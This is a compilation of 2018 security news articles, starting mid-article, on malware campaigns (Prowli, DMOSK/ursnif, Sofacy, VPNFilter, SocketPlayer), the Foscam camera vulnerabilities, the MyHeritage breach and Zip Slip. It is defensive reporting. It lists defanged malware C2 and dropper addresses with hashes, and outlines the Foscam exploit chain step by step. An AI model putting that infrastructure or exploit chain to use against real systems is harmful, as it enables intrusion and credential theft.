Since the attackers behind the Prowli attack are abusing the infected devices and websites to mine cryptocurrency or run a script that redirects them to malicious websites, researchers believe they are more focused on making money rather than ideology or espionage.
According to GuardiCore researchers, the compromised devices were found infected with a Monero (XMR) cryptocurrency miner and the "r2r2" worm—a malware written in Golang that executes SSH brute-force attacks from the infected devices, allowing the Prowli malware to take over new devices.

In simple words, "r2r2 randomly generates IP address blocks and iteratively tries to brute force SSH logins with a user and password dictionary. Once it breaks in, it runs a series of commands on the victim," the researchers explain.
These commands are responsible for downloading multiple copies of the worm for different CPU architectures, a cryptocurrency miner and a configuration file from a remote hard-coded server.
Attackers Also Tricks Users Into Installing Malicious Extensions
Besides cryptocurrency miner, attackers are also using a well known open source webshell called "WSO Web Shell" to modify the compromised servers, eventually allowing attackers to redirect visitors of websites to fake sites distributing malicious browser extensions.
The GuardiCore team traced the campaign across several networks around the world and found the Prowli campaign associated with different industries.
"Over a period of 3 weeks, we captured dozens of such attacks per day coming from over 180 IPs from a variety of countries and organizations," the researchers said. "These attacks led us to investigate the attackers' infrastructure and discover a wide-ranging operation attacking multiple services."
How to Protect Your Devices From Prowli-like Malware Attacks
Since the attackers are using a mix of known vulnerabilities and credential guessing to compromise devices, users should make sure their systems are patched and up to date and always use strong passwords for their devices.
Moreover, users should also consider locking down systems and segmenting vulnerable or hard to secure systems, in order to separate them from the rest of their network.
Late last month, a massive botnet, dubbed VPNFilter, was found infecting half a million routers and storage devices from a wide range of manufacturers in 54 countries with a malware that has capabilities to conduct destructive cyber operations, surveillance and man-in-the-middle attacks.

DMOSK Malware Targeting Italian Companies
8.6.2018 securityaffairs

The security expert and malware researcher Marco Ramilli published a detailed analysis on a new strain of malware dubbed DMOSK that targets Italian firms,
Today I’d like to share another interesting analysis made by my colleagues and I. It would be a nice and interesting analysis since it targeted many Italian and European companies. Fortunately, the attacker forgot the LOG.TXT freely available on the dropping URL letting us know the IP addresses who clicked on the first stage analyzed stage (yes, we know the companies who might be infected). Despite what we did with TaxOlolo we will not disclose the victims IP addresses and so the companies which might be infected. National CERTs have been involved and they’ve got alerted. Since we believe the threat could radically increase its magnitude in the following hours, we decided to write up this quick dirty analysis focusing on speed rather than on details. So please forgive some quick and undocumented steps.
Everything started with an email (how about that ?!). The eMail we’ve got had the following body.

Attack Path
A simple link to a drive ( drive.carlsongracieanaheim.com ) is beginning our first stage of infection. An eMail address is given as one parameter to the doc.php script which would record the IP address and the “calling” email address belonging to the victim. The script forces the browser to download a .zip file which uncompressed presents to the victim a JSE file called: scan.jse. The file is hard obfuscated. It was quite difficult to be able to decode the following stage of infection since the JavaScript was obfuscated through, at least, 3 different techniques. The following image shows the Obfuscated sample.

Second Stage: Obfuscated JSE
Unfortunately the second stage is not the final one. Indeed once de-obfuscated it we figured out that it was dropping and executing another file having the .SCR mimetype. From this stage it’s interesting to observe that only one dropping URL was called. It’s a strange behaviour, usually the attackers use multiple dropping URLs in order to get more chances to infect the victims. The found URL was the following one:
“url”: “https://drive.carlsongracieanaheim.com/x/gate.php”
The JSE file dropped the Third Stage into \User\User\AppData\Local\Temp\38781520.scr having the following hash: 77ad9ce32628d213eacf56faebd9b7f53e6e33a1a313b11814265216ca2c4745 which has been previously analysed by 68 AV but only 9 of them recognised as malicious generic file. The following image shows the VirusTotal analysis.

Third Stage: Executable SCR file

Unfortunately, we are still not at the end of the infection Stage. The Third stage drops and executes another payload. It does not download and execute from a different dropping website but it drops from a special and crafted memory address (fixed from .txt:0x400000). The following image shows the execution of the Fourth Stage payload directly from the victim’s memory

Fourth Stage: Dropped PE File
Following the analysis it has been possible to figure out that the final payload is something very close to ursnif which grabs victims email information and credentials. The following image shows the temporary file built before sending out information to Command and Controls servers.

Temporary File Before Sending data to Command and Control
Like any other ursnif the malware tries to reach a command and control network located both on the clear net and on the TOR network. The following section will expose the recorded IoCs.

An interesting approach that was adopted by attackers is the blacklisting. We observed at least 3 blacklists. The first one was based on victims IP. We guess (but we have not evidence on that) that the attacker would filtering responses based on Country in order to make possible a country targeted attack by blacklisting not-targeted countries. The following image shows the used temporary file to store Victim IP. The attacker could use this information in order to respond or not to a specific malware request.

Temporary File Storing IP Victim IP Address

A second black list that we found was on the dropping URL web site which was trained to do not drop files to specific IP addresses. The main reasons found to deny the dropping payload were three:
geo (Out of geographical scope). The threat is mainly focused to hit italy.
asn (internet service providers and/or cloud providers). The threat is mainly focused on clients and not on servers, so it would have no sense to give payload to cloud providers.
MIT. THe attacker does not want the dropping payload ends up to MIT folks, this is quite funny, isn’t it ?

A small section of blacklisting drop payload
The blacklists are an interesting approach to reduce the chance to be analyzed, in fact, the blacklisted IPs belong to pretty known CyberSecurity Companies (Yoroi is included) which often use specific cloud providers to run emulations and/or sandboxes.
Personal note: This is a reverse targeting attack, where the attacker wants to attack an entire set of victims but not some specific ones, so it introduces a blocking delivery of payload technique. End personal note.
Now we know how the attack works, so lets try to investigate a little bit what the attacker messed out. For example lets try to analyse the content of the Dropping URL. Quite fun to figure out the attacker let freely available his private key ! I will not disclose it …. let’s say… for respect to the attacker (? really ?)

Attacker Private Key !
While the used public certificate is the following one:

Attacker Certificate
By decoding the fake certificate the analyst would take the following information, of course, none of these information would be valuable, but make a nice shake of analysis.

Common Name: test.dmosk.local
Organization: Global Security
Organization Unit: IT Department
Locality: SPb
State: SPb
Country: RU
Valid From: June 5, 2018
Valid To: June 5, 2022
Issuer: Global Security
Serial Number: 12542837396936657430 (0xae111c285fe50a16

Maybe the most “original string”, by the meaning of being written without thinking too much from the attacker, on the entire malware analysis would be the string ‘dmosk’ (in the decoded certificate), from here the Malware name.
As today we observed: 6617 email addresses that potentially could be compromised since they clicked on the First stage (evidence on dropping URL). We have evidence that many organisations have been hit by this malware able to bypass most of the known security protections since it was behind CloudFlare and with not a specific bad reputation. We decided to not disclose the “probably infected” companies. Nation Wide CERTs have been alerted (June 7 2018) and together we will contact the “probably infected” companies to help them to mitigate the threat.
Please update your rules, signature and whatever you have to block the infection.
PS: the threat is quite a bit bigger than what I described, there are several additional components including APK (Android Malware), base ciphers, multi-stage obfuscators and a complete list of “probably infected” users, but again, we decided to encourage the notification speed rather than analysis details.
Hope you might find it helpful.

https:// drive[.carlsongracieanaheim[.com/doc.php
https:// drive[.carlsongracieanaheim[.com/doc1.php
https:// drive[.carlsongracieanaheim[.com/x/gate.php
https:// drive[.carlsongracieanaheim[.com/1/gate.php
C2 (tor):
https:// 4fsq3wnmms6xqybt[.onion/wpapi
https:// em2eddryi6ptkcnh[.onion/wpapi
https:// nap7zb4gtnzwmxsv[.onion/wpapi
https:// t7yz3cihrrzalznq[.onion/wpapi
https:// loop.evama.[at/wpapi
https:// torafy[.cn/wpapi
https:// u55.evama[.at/wpapi
https:// yraco[.cn/wpapi
https:// inc.robatop.[at/wpapi
https:// poi.robatop.[at/wpapi
https:// arh.mobipot.[at/wpapi
https:// bbb.mobipot.[at/wpapi
https:// takhak.[at/wpapi
https:// kerions.[at/wpapi
https:// j11.evama[.at/wpapi
https:// clocktop[.at/wpapi
https:// harent.[cn/wpapi
067b39632f093821852889b1e4bb8b2a48afd94d1e348702a608a70bb7b00e54 zip
77ad9ce32628d213eacf56faebd9b7f53e6e33a1a313b11814265216ca2c4745 jse
8d3d37c9139641e817bcf0fad8550d869b9f68bc689dbbf4b4d3eb2aaa3cf361 scr
1fdc0b08ad6afe61bbc2f054b205b2aab8416c48d87f2dcebb2073a8d92caf8d exe
afd98dde72881d6716270eb13b3fdad2d2863db110fc2b314424b88d85cd8e79 exe

Russia-linked Sofacy APT group adopts new tactics and tools in last campaign
8.6.2018 securityaffairs APT

Sofacy APT group (APT28, Pawn Storm, Fancy Bear, Sednit, Tsar Team, and Strontium) continues to operate and thanks to rapid and continuously changes of tactics the hackers are able to remain under the radar.
According to experts from Palo Alto Networks, the hackers also used new tools in recent attacks, recently the APT group has shifted focus in their interest, from NATO member countries and Ukraine to towards the Middle East and Central Asia.

The researchers observed several attacks leveraging the SPLM and the Zebrocy tool between the second and fourth quarters of 2017 against organizations in Asia. The list of targeted countries included China, Mongolia, South Korea and Malaysia.

Back to the present, the Sofacy APT group is using a new version of the Zebrocy backdoor written in a C++, attackers adopted the Dynamic Data Exchange (DDE) attack technique to deliver malware.

The DDE attack technique was exploited to deliver payloads such as the Zebrocy backdoor and the open-source penetration testing toolkit Koadic.

This is the first time that the Russian APT uses the Koadic tool.

“Following up our most recent Sofacy research in February and March of 2018, we have found a new campaign that uses a lesser known tool widely attributed to the Sofacy group called Zebrocy. Zebrocy is delivered primarily via phishing attacks that contain malicious Microsoft Office documents with macros as well as simple executable file attachments.” reads the analysis published by Palo Alto Networks.

“This third campaign is consistent with two previously reported attack campaigns in terms of targeting: the targets were government organizations dealing with foreign affairs. In this case however the targets were in different geopolitical regions.”

Palo Alto noticed a change in the tactics used by the hackers, instead of targeting a handful of employees within an organization, they sent phishing messages to “an exponentially larger number of individuals” within the same organization.

Attackers obtained the list of individuals’ emails with simple queries to search engines, this method is also a novelty for the Sofacy APT group.

The researchers linked this campaign to previous attacks, in February Palo Alto Networks reported the Sofacy APT group was hiding infrastructure using random registrant and service provider information in each attack.

“In our February report, we discovered the Sofacy group using Microsoft Office documents with malicious macros to deliver the SofacyCarberp payload to multiple government entities.” continues Palo Alto.

“In that report, we documented our observation that the Sofacy group appeared to use conventional obfuscation techniques to mask their infrastructure attribution by using random registrant and service provider information for each of their attacks. In particular, we noted that the Sofacy group deployed a webpage on each of the domains.”

Sofacy APT

The investigation on this campaign allowed the experts to discover another campaign leveraging the DealersChoice exploit kit and a domain serving the Zebrocy AutoIT downloader.

The version of Zebrocy downloader delivered by this domain is the new one written in C++, the downloader was used to spread the Delphi backdoor hosted at IP address 185.25.50[.]93.

The experts discovered the following hard-coded user agent being used by many samples of Zebrocy targeting the foreign affairs ministry of a large Central Asian nation:

Mozilla/5.0 (Windows NT 6.1; WOW64) WinHttp/ (WinHTTP/5.1) like Gecko
The experts found two weaponized Office documents implementing the DDE attack technique, the malicious files were used in attacks against a North American government organization dealing with foreign affairs.

Further details, including IoCs are reported in the analysis published by Palo Alto Networks.

Facebook confirms privacy settings glitch in a new feature exposed private posts of 14 Million users

8.6.2018 securityaffairs Social

Facebook admitted that a bug affecting its platform caused the change of the settings of some 14 million users, potentially exposing their private posts to the public.
This is the worst period in the history of the social network giant that was involved in the Cambridge Analytica privacy scandal that affected at least 87 Million users.

“We recently found a bug that automatically suggested posting publicly when some people were creating their Facebook posts. We have fixed this issue and starting today we are letting everyone affected know and asking them to review any posts they made during that time,” said Erin Egan, Facebook’s chief privacy officer.

“To be clear, this bug did not impact anything people had posted before—and they could still choose their audience just as they always have. We’d like to apologize for this mistake.”

According to Facebook, the glitch affected some of its users that published posts between May 18 and May 27 because in that period of time it was implementing a new feature for the sharing of data such as images and videos.

Evidently, something went wrong, and the overall private messages were shared as public by defaults.

The social network giant confirmed to have corrected the bug on May 22, but it was unable to change the visibility of all the posts.

The company is now notifying affected users apologizing for the technical issue.

This is the last embarrassing case that involved Facebook in the last weeks, in April, researchers from Princeton researchers reported that the Facebook’s authentication feature “Login With Facebook” can be exploited to collect user information that was supposed to be private.

Early this week, Facebook confirmed that its APIs granted access to the data belonging to its users to more than 60 device makers, including Amazon, Apple, Microsoft, Blackberry, and Samsung so that they could implement Facebook messaging functions.

The Chinese vendor Huawei was one of the device makers authorized to use the API, the firm, in May the Pentagon ordered retail outlets on US military bases to stop selling Huawei and ZTE products due to unacceptable security risk they pose.

Facebook highlighted that the agreement was signed ten years and that its operated to prevent any abuse of the API.

Multiple models of IP-based cameras from Chinese firm Foscam could be easily hacked. Update the firmware now!
8.6.2018 securityaffairs

A security vulnerability was discovered in webcams, IP surveillance cameras and also baby monitors manufactured by the Chinese firm Foscam.
The Chinese firm Foscam has released firmware updates to address three vulnerabilities in multiple models of IP-based cameras that could be exploited to take control of vulnerable cameras exposed online.

The following flaws were reported by the experts from IoT security firm VDOO:

chaining the three flaw the hackers could completely take over the Foscam cameras.

The experts from VDOO has published a technical analysis of the three vulnerabilities, including a proof-of-concept code.

“One of the vendors for which we found vulnerable devices was Foscam, when our team discovered a critical chain of vulnerabilities in Foscam security cameras. Combining the discovered vulnerabilities, if an adversary successfully obtains the address of the camera, he can gain root access to the affected cameras remotely (over LAN or the internet).” reads the analysis published by VDOO.

“VDOO has responsibly disclosed these vulnerabilities (CVE-2018-6830, CVE-2018-6831 and CVE-2018-6832) and engaged with Foscam security team to solve the matter.”

Below the attack scenario described by VDOO on a network-accessible camera:

The attack scenario on a network-accessible camera is as follows:

Step 1: An adversary must first obtain the camera’s IP address or DNS name. It can be achieved in several ways, including:
If the camera and the network are configured by the user such that the camera has direct interface to the internet, its address might be revealed by some internet scanners.
If the adversary gained unauthorized (remote or local) access to a network to which the camera is connected, he might be able to find the local address of the camera.
If dynamic DNS is enabled by the user, the adversary might find a way to resolve the device name
Step 2: The adversary then uses CVE-2018-6830, an arbitrary file deletion vulnerability, to delete certain critical files that will result in authentication bypass when the webService process reloads.
Step 3: The adversary crashes the webService process by exploiting CVE-2018-6832, a stack-based buffer overflow vulnerability in the webService process. After it crashes, the webService process is automatically restarted by the watchdog daemon, and during the process reload, the changes from step 2 take effect. The adversary is now able to gain administrative credentials.
Step 4: The adversary executes root commands by exploiting CVE-2018-6831. This is a shell command injection vulnerability that requires administrator credentials. Since the adversary gained administrator credentials in the previous stage, he can now use this vulnerability to execute commands as the root user for privilege escalation. Full details appear in the Technical Deep Dive below.
Foscam Internet-connected cameras

In June 2017, experts at F-Secure discovered tens of vulnerabilities in tens of thousands of Internet-connected cameras from China-based manufacturer Foscam, but at the time the Chinese firm ignored the report from the security firm.

The experts published a long list of affected Foscam device models and firmware versions, users urge to update the firmware as soon as possible.

Likely many other camera models from other vendors could be affected by the vulnerabilities because Foscam also provides its products in white-label mode.

Teen Arrested for Hacking Minnesota Government Systems
7.6.2018 securityweek Crime

The United States Department of Justice this week announced the arrest of an individual charged with the hacking of servers owned by the State of Minnesota.

The suspect, Cameron Thomas Crowley, 19, who uses the online handle of Vigilance, made an initial appearance in court on Tuesday, before United States Magistrate Judge Becky R. Thorson in Saint Paul, Minnesota. He remains in federal custody pending his detention hearing.

In addition to announcing Crowley’s arrest, the Department of Justice revealed a five-count indictment that charges the individual with intentional access to a protected computer, intentional damage to a protected computer, and aggravated identity theft.

The indictment alleges that, between May 28, 2017 and June 17, 2017, Crowley intentionally accessed protected servers owned by the State of Minnesota and other entities, without authorization.

In June last year, Vigilance announced on Twitter the hacking of databases belonging to the Minnesota state government and the theft of over a thousand email addresses and corresponding passwords, all of which were dumped online.

The hacker said at the time the action was the result of a jury finding Jeronimo Yanez, a police officer from St. Anthony, Minnesota, not guilty of manslaughter after he shot and killed African-American Philando Castile during a seemingly routine traffic stop in the summer of 2016.

Castile, 32, was shot seven times when he tried to reach for his ID, after he told Yanez he had a gun and a license to carry it. Castile was in the car with his girlfriend and their 4-year-old daughter.

Crowley is also charged with transmitting programs, code, and commands to the compromised servers, causing damage that led to a loss to the State of Minnesota of more than $5,000.

Thus, the alleged hacker is charged with three counts of intentional access to a protected computer and one count of intentional damage to a protected computer. Additionally, the indictment charges Crowley with one count of aggravated identity theft.

The investigation into this case is conducted by the Federal Bureau of Investigation and the Minnesota Bureau of Criminal Apprehension.

92 Million User Credentials Exposed in MyHeritage Data Breach
7.6.2018 securityweek Incindent

[Updated] MyHeritage, a DNA and genealogy firm, announced Monday that the access credentials of 92 million users had been stolen. It only discovered the breach when a security researcher informed the company he had found a file named myheritage stored outside of MyHeritage.

The file contains, writes MyHeritage CISO Omer Deutsch in a statement, "the email addresses and hashed passwords of 92,283,889 users who had signed up to MyHeritage up to and including Oct 26, 2017 which is the date of the breach." He stresses that the passwords are stored as "a one-way hash of each password, in which the hash key differs for each customer" (possibly implying that each password is hashed with a unique salt).

Deutsch believes that only the credentials were stolen. "We have no reason to believe that any other MyHeritage systems were compromised." Furthermore, he adds, "we have not seen any activity indicating that any MyHeritage accounts had been compromised." Payment data, user DNA data and family trees have not been affected.

MyHeritage went public with commendable speed – on the same day it learnt of the breach. However, some aspects of the statement are concerning. For example, it immediately set up an incident response team to investigate the incident. Best practice would have such a team already established in anticipation of a breach.

The firm is expediting "work on the upcoming two-factor authentication feature that we will make available to all MyHeritage users soon." Best practice would have had MFA in place long ago. Furthermore, it will 'recommend' rather than require users to employ the MFA option. It also recommends users should change their passwords, when it should perhaps force a password reset on all users.

"It appears that MyHeritage hasn't taken the steps to automatically require users to change passwords, just that they recommend they do," comments Absolute Software's Global Security Strategist Richard Henderson. "That should be an immediate action for any breach of this type. We still don't know (and neither do they) how this information was stolen, or the motives for doing so... and the statement by MyHeritage that they believe no other data was taken, especially unique DNA information and genealogy information, is probably a little premature, until they can determine exactly what happened late last October."

The reassuring tone of the MyHeritage statement is also challenged by Anthony James, CMO of CipherCloud. "Don't believe for a second that a hashed password is safe," he says. "Hashed passwords are absolutely not safe if stolen – these hashed passwords are still highly vulnerable to a dictionary attack, where the attacker runs a hash function against the top 100,000 most popular passwords and computes the hash function against all of them. Then all they need do is compare these calculated values to the list stolen from MyHeritage. So, NO, a smart cyber-attacker could be working diligently, even now, to map the hashed values to real passwords and break the accounts."

The unknown quality of the hashing function could make the credential cracking more difficult, but not necessarily impossible. Furthermore, it may not be necessary if the user has had the same password with the same email address stolen in a different breach with a weak hash function. SecurityWeek has contacted MyHeritage asking for further details on the hashing process, and will update this report with any response.

Rick Moy, CMO at Acalvio, is concerned that MyHeritage did not itself detect the intrusion, "as demonstrated by the seven-month delay, and the fact they were alerted by a third party." The implication is that the firm does not have adequate detection capabilities – and if it failed to detect this, there may be other incidents with the other systems that have also gone undetected.

This possibility also concerns Rashmi Knowles, EMEA Field CTO at RSA Security. "If your password is stolen, it can be updated, but this isn't the case with genetic information," she warns. "You only have one genetic identity, so if this is stolen there are potentially much more serious consequences. But many people don't think about this when applying for such services. No matter how secure the organization, no one is completely risk-free, and if breached, genetic data could be sold on to other hackers without your consent, or the characteristic data it contains could be used to hijack your online accounts. There's even a possibility that hackers can amend or even delete genetic data in some cases, which could have serious implications for the victim and the level of healthcare or even health insurance they could access in the future."

There is potentially an additional side-story to this incident. MyHeritage reports, "We are taking steps to inform relevant authorities including as per GDPR." SecurityWeek has asked MyHeritage to expand on this. Who are the relevant GDPR authorities for MyHeritage?

The firm lists numerous contact phone numbers in various European countries, including the provision of "24/7 support" from the Irish phone. This suggests that the Irish regulator may be the relevant GDPR authority for MyHeritage. There is little doubt that MyHeritage is liable under GDPR, and it seems that it is reachable by the GDPR authorities via its European offices. The only question here is whether Europe will decide to make a high-profile example of MyHeritage early into the GDPR age.

But what about the researcher? Is he or she also liable under GDPR for unsanctioned storage of and access to European PII? It is a moot point. The UK's Information Commissioner's Office has told SecurityWeek that researchers are exempt from GDPR under the principle of 'legitimate interest'.

This is not the view of David Flint, senior partner at MacRoberts LLP. Asked if researchers should be concerned about GDPR, he told SecurityWeek, "The short answer is YES! Under the GDPR/DPA 2018 the researcher couldn't be a Processor (as he is not acting on instructions of a Controller) therefore he must be a Controller."

So, as a controller, "If a researcher comes across that data he should advise all the Data Subjects that he has the data and what he intends to do with it, sending them a Privacy Notice. (article 14). Article 89 GDPR deals with an exemption for historical research which doesn't seem relevant here."

It is interesting times. MyHeritage users will need to wait to see if their DNA has or may be compromised, researchers will need to wait to see if GDPR may be enforced against them; and businesses around the world – including MyHeritage – will be waiting to see how forcefully GDPR will be enforced by the European Union.


In a new blog posted Wednesday, MyHeritage has announced that it will be retiring all existing MyHeritage passwords. "To maximize the security of our users, we have started the process of expiring ALL user passwords on MyHeritage," writes CISO Omer Deutsch. "This process will take place over the next few days. It will include all 92.3 million affected user accounts plus all 4 million additional accounts that have signed up to MyHeritage after the breach date of October 26, 2017. As of now, we’ve already expired the passwords of more than half of the user accounts on MyHeritage. Users whose passwords were expired are forced to set a new password and will not be able to access their account and data on MyHeritage until they complete this."

ALTR Emerges From Stealth With Blockchain-Based Data Security Solution
7.6.2018 securityweek Security

Austin, Texas-based ALTR emerged from stealth mode on Wednesday with a blockchain-based data security platform and $15 million in funding.

ALTR announced the immediate availability of its product, which has been in development for nearly four years while the company operated in stealth mode.

Originally designed to serve as the public transactions ledger for the Bitcoin cryptocurrency, blockchain is a distributed database consisting of blocks that are linked and secured using cryptography. Companies have been increasingly using blockchain for purposes other than cryptocurrency transactions, including for identity verification and securing data and devices.

ALTR’s platform uses blockchain technology for secure data access and storage. Built on what the company names ALTRchain, the solution allows organizations to monitor, access and store highly sensitive information.

ALTR emerges from stealth

The ALTR platform is designed to sit between data and applications, and it can be deployed without making any changes to existing software or hardware infrastructure. It offers support for all major database systems, including from Oracle, Microsoft and others.

The platform has three main components: ALTR Monitor, ALTR Govern, and ALTR Protect. ALTR Monitor provides intelligence on data access activities, creating an audit trail of blockchain-based log files.

ALTR Govern is designed for controlling how users access business applications. Organizations can create and apply rule-based locks and access thresholds in an effort to prevent breaches.

ALTR Protect is designed to protect data at rest. It decentralizes sensitive data and stores it across a private blockchain in an effort to protect it against unauthorized access in case any single node has been compromised.

The company also announced that it has opened access to its proprietary blockchain technology by making available its ChainAPI, which allows developers to add ALTRchain to their applications.

ALTR has raised $15 million in funding from private and institutional sources in the cybersecurity, financial services and IT sectors. The money will be used to extend the reach of the company’s platform and launch additional products based on ALTRchain.

ALTR told SecurityWeek that its platform has already been deployed at a healthcare organization, a mid-sized service provider that caters to both Fortune 1000 companies and government agencies, and a couple of firms in the financial services sector.

VPNFilter Targets More Devices Than Initially Thought
7.6.2018 securityweek

Researchers continue to analyze the VPNFilter attack and they have discovered new capabilities and determined that the threat targets a larger number of devices than initially believed.

Cisco Talos’ initial report on VPNFilter said the threat targeted 16 routers and network-attached storage (NAS) devices from Linksys, MikroTik, Netgear, TP-Link and QNAP. It turns out that not only is the malware capable of hacking more device models from these vendors, it can also take control of products from ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE.

Talos now lists a total of more than 50 impacted devices. While researchers have identified a sample targeting UPVEL products, they have not been able to determine exactly which models are affected.

Experts have also found a new stage 3 endpoint exploitation module that injects malicious content into traffic as it passes through a compromised network device.

The new module, dubbed “ssler,” provides data exfiltration and JavaScript injection capabilities by intercepting traffic going to port 80. Attackers can control which websites are targeted and where the stolen data is stored.

“With this new finding, we can confirm that the threat goes beyond what the actor could do on the network device itself, and extends the threat into the networks that a compromised network device supports,” Talos explained.

Another new stage 3 module discovered after the initial analysis, dubbed “distr,” allows stage 2 modules to remove the malware from a device and then make that device unusable.

One interesting capability of VPNFilter is to monitor the network for communications over the Modbus SCADA protocol. Talos has conducted further analysis of this sniffer and published additional details.

When it was discovered, the VPNFilter botnet had ensnared roughly 500,000 devices across 54 countries. However, experts believe the main target is Ukraine and, along with U.S. authorities, attributed the threat to Russia, specifically the group known as Sofacy, with possible involvement of the actor tracked as Sandworm.

The FBI has managed to disrupt the botnet by seizing one of its domains, but researchers noticed that the attackers have not given up and continue to target routers in Ukraine.

Backdoor Uses Socket.io for Bi-directional Communication
7.6.2018 securityweek

A recently discovered remote access Trojan is using a specialized program library that allows operators to interact with the infected machines directly, without an initial “beacon” message, G Data reports.

Dubbed SocketPlayer, the backdoor stands out because it doesn’t use the typical one-way communication system that most banking Trojans, backdoors, and keyloggers use. Instead, it employs the socket.io library, which enables real-time, bi-directional communication between applications.

Because of this feature, the malware handler no longer has to wait for the infected machine to initiate communication, and the malware operator can contact the compromised computer on their own.

G Data security researchers observed two variants of SocketPlayer in the wild, one acting as a downloader capable of executing arbitrary code from a website, while the other featuring more complex capabilities, including detection and sandbox evasion mechanisms.

Once it has been installed on a compromised machine, the malware waits for commands from the operator, and can perform a variety of actions, such as sniffing through drives, screenshot recording, fetching and running code, and more.

The researchers also discovered that other functions are also selectable, though they do not appear to have been implemented yet. One of them, for example, appears to have been intended as a keylogger, though no actual keylogging functionality is present in the backdoor.

The observed malware sample was being distributed through an Indian website, but it’s unclear how the backdoor spreads. Regardless of whether the website was used for infection purposes or only as a mirror, the malicious file remained unnoticed on it for a long time.

The first variant of SocketPlayer was first submitted to VirusTotal on March 28, with a second sample submitted on March 31, G Data explains in a technical report (PDF).

The infection routine starts with the downloader checking if it runs in a sandboxed environment. If it doesn’t, it fetches an executable file, decrypts it, and uses the Invoke method to run it in memory.

The invoked program creates a socket connection to the host hxxp://, as well as a registry key to achieve persistence. It also checks if a Process Handler/ folder exists and creates it if it doesn’t. Next, the program creates an autostart key with the value “Handler.”

It also downloads another executable, which in turn downloads SocketPlayer, decrypts it, and runs it in memory.

The security researchers also noticed that the two variants of the backdoor went through a series of changes between samples, such as the use of a new command and control port, new file locations, different information sent in the initial routine, new commands added to the server, and new functionality included in the malware.

Critical Vulnerability Addressed in Popular Code Libraries
7.6.2018 securityweek

A critical and widespread arbitrary file overwrite vulnerability has been addressed in popular libraries of projects from HP, Amazon, Apache, Pivotal, and more.

Dubbed Zip Slip and discovered by the Snyk Security, the vulnerability exists when the code that extracts files from an archive doesn’t validate the file paths in the archive.

The security flaw was responsibly disclosed to the impacted parties starting in mid-April and is said to impact thousands of projects. The issue has been found in multiple ecosystems, including JavaScript, Ruby, .NET and Go.

According to Snyk Security, Java has been impacted the most, as it lacks a central library for the high level processing of archive files. Because of that, vulnerable code snippets “were being hand crafted and shared among developer communities such as StackOverflow,” the security researchers explain.

Exploitation is possible via a specially crafted archive containing directory traversal filenames. Numerous archive formats are affected by the bug, including tar, jar, war, cpio, apk, rar and 7z.

“Zip Slip is a form of directory traversal that can be exploited by extracting files from an archive,” Snyk Security explains.

The directory traversal vulnerability allows an attacker to access parts of the file system residing outside of their target folder. The attacker can then overwrite executable files and achieve remote command execution on the victim’s machine when these files are executed. The flaw can also be abused to overwrite configuration files or other sensitive resources.

“The two parts required to exploit this vulnerability is a malicious archive and extraction code that does not perform validation checking,” the researchers explain.

First, the archive should contain one or more files designed to break out of the target directory when extracted. The contents of the archive need to be hand crafted, as archive creation tools “don’t typically allow users to add files with these paths,” Snyk Security notes. Armed with the right tools, however, an attacker can easily create files with these paths.

Second, the attacker needs to extract the archive, either using a library or own code.

“You are vulnerable if you are either using a library which contains the Zip Slip vulnerability or your project directly contains vulnerable code, which extracts files from an archive without the necessary directory traversal validation,” the researchers say.

In a GitHub repository, Snyk published a list of impacted libraries, which includes npm (language JavaScript), Java (language Java), .NET (languages: .NET and Go), Ruby gem (language Ruby), Go (language Go), Oracle (language Java), and Apache (language Java).

“Of the many thousands of projects that have contained similar vulnerable code samples or accessed vulnerable libraries, the most significant include: Oracle, Amazon, Spring/Pivotal, Linkedin, Twitter, Alibaba, Jenkinsci, Eclipse, OWASP, SonarCube, OpenTable, Arduino, ElasticSearch, Selenium, Gradle, JetBrains and Google,” the researchers note.

Snyk also notes that some projects were patched despite being confirmed not vulnerable, while others that continue to use the vulnerable code implementation are said to be not exploitable. Specifically, “it is believed that it would not be possible to attack these projects in such a way that could lead to a malicious outcome,” the researchers say.

Facebook Deals With Chinese Firm Draw Ire From U.S. Lawmakers
7.6.2018 securityweek

Facebook drew fresh criticism from US lawmakers following revelations that it allowed Chinese smartphone makers, including one deemed a national security threat, access to user data.

The world's largest social network confirmed late Tuesday that China-based Huawei -- which has been banned by the US military and a lightning rod for cyberespionage concerns -- was among device makers authorized to see user data.

Facebook has claimed the agreements with some 60 device makers dating from a decade ago were designed to help the social media giant get more services into the mobile ecosystem.

Nonetheless, lawmakers expressed outrage that Chinese firms were given access to user data at a time when officials were trying to block their access to the US market over national security concerns.

Senator Ed Markey said Facebook's chief executive has some more explaining to do following these revelations.

"Mark Zuckerberg needs to return to Congress and testify why @facebook shared Americans' private information with questionable Chinese companies," the Massachusetts Democrat said on Twitter.

"Our privacy and national security cannot be the cost of doing business."

Other lawmakers zeroed in on the concerns about Huawei's ties to the Chinese government, even though the company has denied the allegations.

"This could be a very big problem," tweeted Senator Marco Rubio, a Florida Republican.

"If @Facebook granted Huawei special access to social data of Americans this might as well have given it directly to the government of #China."

Representative Debbie Dingell called the latest news on Huawei "outrageous" and urged a new congressional probe.

"Why does Huawei, a company that our intelligence community said is a national security threat, have access to our personal information?" said Dingell, a Michigan Democrat, on Twitter.

"With over 184 million daily Facebook users in US & Canada, the potential impact on our privacy & national security is huge."

'Approved experiences'

Facebook, which has been blocked in China since 2009, also had data-access deals with Chinese companies Lenovo, OPPO and TCL, according to the company, which had similar arrangements with dozens of other devices makers.

Huawei, which has claimed national security fears are unfounded, said in an emailed statement its access was the same as other device makers.

"Like all leading smartphone providers, Huawei worked with Facebook to make Facebook's service more convenient for users. Huawei has never collected or stored any Facebook user data."

The revelations come weeks after Zuckerberg was grilled in Congress about the hijacking of personal data on some 87 million Facebook users by Cambridge Analytica, a consultancy working on Donald Trump's 2016 campaign.

Facebook said its contracts with phone makers placed tight limits on what could be done with data, and "approved experiences" were reviewed by engineers and managers before being deployed, according to the social network.

Any data obtained by Huawei "was stored on the device, not on Huawei's servers," according to Facebook mobile partnerships chief Francisco Varela.

Facebook said it does not know of any privacy abuse by cellphone makers who years ago were able to gain access to personal data on users and their friends.

It has argued the data-sharing with smartphone makers was different from the leak of data to Cambridge Analytica, which obtained private user data from a personality quiz designed by an academic researcher who violated Facebook's rules.

Facebook is winding up the interface arrangements with device makers as the company's smartphone apps now dominate the service. The integration partnership with Huawei will terminate by the end of this week, according to the social network.

The news comes following US sanctions on another Chinese smartphone maker, ZTE -- which was not on the Facebook list -- for violating export restrictions to Iran.

The ZTE sanctions limiting access to US components could bankrupt the manufacturer, but Trump has said he is willing to help rescue the firm, despite objections from US lawmakers.

AXA Partners With SecurityScorecard to Set Cyber Insurance Premiums
7.6.2018 securityweek Cyber

